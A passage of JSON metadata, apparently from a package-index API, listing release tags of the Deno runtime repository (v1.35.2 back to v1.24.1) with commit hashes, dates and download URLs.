-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.